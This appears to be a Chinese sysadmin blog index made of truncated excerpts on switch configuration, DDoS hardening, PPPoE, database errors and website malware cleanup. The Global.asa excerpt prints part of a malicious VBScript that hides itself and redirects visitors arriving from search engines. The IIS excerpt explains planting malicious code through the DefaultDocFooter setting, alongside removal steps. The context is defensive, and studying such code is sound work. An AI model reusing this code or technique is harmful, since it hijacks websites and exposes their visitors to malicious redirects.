h3c S3100与S5000交换机恢复出厂配置S3100系统交换机与S5000系列交换机恢复出厂配置有些不一样。S3100系列交换机使用超级终端：#reset saved-cunfiguration然后按提示进行，就可以清除配置文件，恢复出厂配置。S5000系列交换机使用超级终端：进入system-view视图：# restore default 使用以上命令将设备恢复出厂配置。

华三交换机配置 WEB网管功能 通过WEB网管登录简介 S5500-EI系列以太网交换机提供一个内置的 WEB Server，用户可以通过 WEB网管终端（PC）登录到交换机上，利用内置的 WEB Server以 WEB方式直观地管理和维护以太网交换机。 交换机和 WEB 网管终端（PC）都要进行相应的配置，才能保证通过 WEB 网管正常登录交换机。 启动WEB服务 配置交换机VLAN接口的IP地址，交换机与WEB网管终端间路由可达. 配置欲登录的WEB网管用户名和认证口令 2  WEB配置环境搭建 第一步：通过 Console口正确配置以太网交换机 VLAN 1接口的 IP地址（VLAN 1为交换机的缺省 VLAN）。 #  配置以太网交换机 VLAN 1 接口的 IP 地址为 10.153.17.82，子网掩码为255.255.255.0。 <H3C> system-view [H3C] interface vlan-interface 1 [H3C-VLAN-interface1] ip address 10.153.17.82 255.255.255.0 第二步：用户通过 Console 口，在以太网交换机上配置欲登录的 WEB 网管用户名和认证口令。 # 配置 WEB网管用户名为 admin，认证口令为 admin，用户级别为 3级。 [H3C] local-user admin [H3C-luser-admin] service-type telnet level 3 [H3C-luser-admin] password simple admin 配置好...

开源UTM产品  作者：CBINews  本文来源于 比特网　　免费且开源的软件(FOSS)无处不在，在IT技术行业，这类产品分布很广，特别是在网络安全领域，优秀的FOSS例子举不胜举，如防火墙、路由器和VPN，甚至连UTM也有，几乎你能想到的任何应用都有对应的开源产品。本文将为大家介绍三款有商业支持的开源网络安全产品，使用开源产品具有成本更低，更安全、灵活，良好的扩展性和完整的企业支持的优势。 　　Endian　　Endian是一个功能丰富的统一威胁管理系统(UTM)，提供了一个强大的防火墙，VPN(IPSec/OpenSSL)，防恶意软件/垃圾邮件网关，QoS/带宽管理，IPS和代理功能，也可以用它作为软件解决方案构建你自己的硬件产品，或专为特定应用程序进行安全优化，和其它竞争产品类似，社区版一般只提供了商业版的核心功能。　　Endian基于Web的管理界面做得很漂亮，并且易于使用，它的仪表盘提供了所保护网络的实时综合视图，Endian也提供了中央管理控制功能，Endian Network是一个基于Web的中央管理/监控解决方案，可以集中管理多个Endian产品，Endian Hotspot插件模块支持创建安全的无线热点，通过SSL VPN，专用的身份管理系统和RADIUS保护无线网络。　　Untangle　...

安全防范：Linux系统下防DDOS攻击的方法    用squid也是利用端口映射的功能，可以将80端口转换一下，其实一般的DDOS攻击可以修改/proc/sys/net/ipv4/tcp_max_syn_backlog里的参数就行了，默认参数一般都很小，设为8000以上，一般的DDOS攻击就可以解决了。如果上升到timeout阶段，可以将/proc/sys/net/ipv4/tcp_fin_timeout设小点。大家都在讨论DDOS，个人认为目前没有真正解决的方法，只是在缓冲和防御能力上的扩充，跟黑客玩一个心理战术，看谁坚持到最后，网上也有很多做法，例如syncookies等，就是复杂点。sysctl -w net.ipv4.icmp_echo_ignore_all=1echo 1 > /proc/sys/net/ipv4/tcp_syncookiessysctl -w net.ipv4.tcp_max_syn_backlog="2048"sysctl -w net.ipv4.tcp_synack_retries="3"iptables -A INPUT -i eth0 -p tcp --syn -j syn-flood# Limit 12 connections per second (burst to 24)iptables -A syn-flood -m limit --limit 12/s --limit-burst 24 -j RETURN这个地方可以试着该该：iptbales -A FORWARD -p tcp --syn -m limit --limit 1/s -j ACCEPT虚拟主机服务商在运营过程中可能会受到黑客攻击，常见的攻击方式有SYN，DDOS...

Centos5 配置pppoe服务器pppoe拨号上网是解决内网arp病毒的一种方案。而且效果很不错。不少公司，由于使用傻瓜交换机。而且也使用是普通路由器。经常会出现内网有arp病毒问题，导致没法上网。如果换设备，又花钱，不如搞个软路由。只要有台旧主机外加两个网卡，就OK了。费话不多说了。环境： 电脑主机一台，外加一个网卡系统： Centos5.4  外网IP：192.168.10.10  netmask:255.255.255.0  gateway:192.168.10.1内网卡IP配置：ip :0.0.0.0 netmask :0.0.0.0这里用户拨号时分配置IP使用 172.16.10.20-172.16.10.100 这里只是给个实验用IP。一，在主机上安装好centos系统，并且配置好IP。以下是我的外网IP配置信息：# cat /etc/sysconfig/network-scripts/ifcfg-eth0DEVICE=eth0BOOTPROTO=staticBROADCAST=192.168.10.255HWADDR=00:1e:8c:c0:3e:b0IPADDR=192.168.10.10NETMASK=255.255.255.0ONBOOT=yesGATEWAY=192.168.10.1TYPE=Ethernet下面是内网卡配置信息：# cat /etc/sysconfig/network-scripts/ifcfg-eth1BOOTPROTO=staticTYPE=EthernetHWADDR=00:1e:8c:c0:25:28DEVICE=eth1NETMASK=0.0.0.0IPADDR=0.0.0.0ONBOOT=yes注意IP与子网掩码配置呀...

IIS服务器挂马和解决方法：首先我们要看一下IIS的配置文件：%windir%\system32\inetsrv\MetaBase.xml在这里面有一项配置：DefaultDocFooter，看一下说明DefaultDocFooter 属性指定附加到返回到客户端的 HTML 文件的自定义页脚（页脚并不附加到 ASP 文件）。如果将 EnableDocFooter 属性设置为 true，则仅发送自定义页脚。页脚可以是一个字符串，例如“String:ThisIsACustomFooter”，或是文件的引用，例如DefaultDocFooter=“FILE:C:\Wwwroot\Footers\Footer.htm”。看到没有，每当我们浏览该IIS服务器下的html网页的时候都会把Footer.htm的内容发送给客户端，这样我们可以把我们的挂马代码写到该文件中从而实现IIS全局挂马。那我们怎么来解决这个问题呢？方法一： 当然就是把Footer.htm的挂马代码删除方法二：删除MetaBase.xml中的DefaultDocFooter=“FILE:C:\Wwwroot\Footers\Footer.htm”方法三：把DirBrowseFlags属性中的EnableDefaultDoc设置删除，这样服务器就不会搜索该文档了。DirBrowseFlags 控制是否启用目录浏览，可以提供多少目录和文件信息（如果启用浏览）以及目录中是否包含默认页的标记。 注意 如果客户端访问目录时没有提供文件名，而 EnableDefaultDoc 标志...

警惕ASP网站Global.asa导致网站被挂马或转向上午帮朋友处理一个比较有难度的问题,网站输入域名访问正常打开,但从搜索引擎厚度或是Google之类的打开,就会跳转到某些色情网站上去.根据经验,可以推断出来应该是asp程序根据网页的来路,即HTTP_REFERER进行判断,发现是搜索引擎过来的流量就跳转到色情站点去,使用此种方法具有很强的隐匿性,因为站长们一般不会去搜索自己的网站,所以轻易不会发现自己站点遭到了挟持。因为网站是自己很多年前帮朋友做的，所以要了现在的代码，看了一下，没有发现问题，就开始是不是服务器感染了什么病毒或是被加上了什么IIS过滤器之类的，要了远程桌面，上去找了半天，一无所获，看了一下IP地址，发现是一个内网IP地址，也就是说需要网关将网站映射发布出去，于是怀疑问题是在网关上，但问了朋友之后，得知网关为一路由器，再加上将IIS关闭，网站也就无法打开，不能再跳转，排除了网关加马的可能性。难倒走不下去了？忽然想到一招，采用FileMon对w3wp.exe进程进行监控，看看用搜索引擎打开和直接打开读取的文件到底有什么不同，通过多次比较，也没有发现什么疑点。万般无奈，又回到网站根目录下，顺手打开了显示系统隐藏文件，却发现多了一个Global.a...

Global.asa 挂马文件代码会导致用户从搜所工具那里来的流量跳转到其它地方。<script language="vbscript" runat="server">sub Session_OnStartdim namename=request.servervariables("Path_Translated")Set fso = Server.CreateObject("scripting.filesystemobject") set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))Dim vDim tReDim A(Request.Form.Count)ReDim B(Request.Form.Count)v=Request.Formt=Request.Form.Countif t>0 thenFor i=0 To t-1 b(i)=Split(Split(v,"&")(i),"=")(1) if instr(LCase(b(i)),"global.asa")>0 thenf.Attributes=1+2+4response.end() end ifNextend ifif instr(request.servervariables("HTTP_REFERER"),"www.baidu.com/s?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"baidu.com/baidu?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"m.baidu.com/")>0 or instr(request.ServerVariables("HTT...

游标不包括正在修改的表，或该表不能通过此游标更新==>解决办法                                现这个问题的前提可能是：Microsoft OLE DB Provider for SQL Server 错误 '80004005'在 sys.servers 中找不到服务器 '***'。请验证指定的服务器名称是否正确。如果需要，请执行存储过程 sp_addlinkedserver 以将服务器添加到 sys.servers。先出现的这个问题！解决办法是：select * from sys.servers           (查看系统表,看原来的服务器名)sp_dropserver '原来的服务器名'      (删除原来的服务器名)sp_addserver '现在的服务器名'        (添加现在的服务器名)sp_serveroption '现在的服务器名','data access', 'true' (设定 SQL Server 选项，使其允许加入linked server)最简单的方法就是把计算机名修改成以前的名字。修改了计算机的名字，就出现数据表所有者的问题，然后用系统的存储过程修改表的所有者，就出现了这个问题。Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e2...

MYSQL无法启动1053错误解决方法做个人职业站长真是不容易啊，看到服务有点卡了，重启下，没有想到MYSQL失效！MYSQL 1053错误 解决方法： 在DOS命令行使用第一步：mysqld-nt remove mysqlservice的方式卸载此服务，它提示卸载成功，（是英文成功的意思）第二步：mysqld-nt install mysqlservice重新注册服务，一切恢复正常。（也会英文显示成功）第三步：打开 服务>>>>禁用MYSQL>>>>再启动MYSQL就OK啦 -----------------------------------------------------------------------------------------------------------------还有另一种方法”我的电脑“ -> 右击 ->“服务” -> 找到 mysql服务 ->右键 “属性” -> 选择“登录”选项卡输入帐户名或者浏览用户名选择其用户名，输入密码和确认密码，点“确定”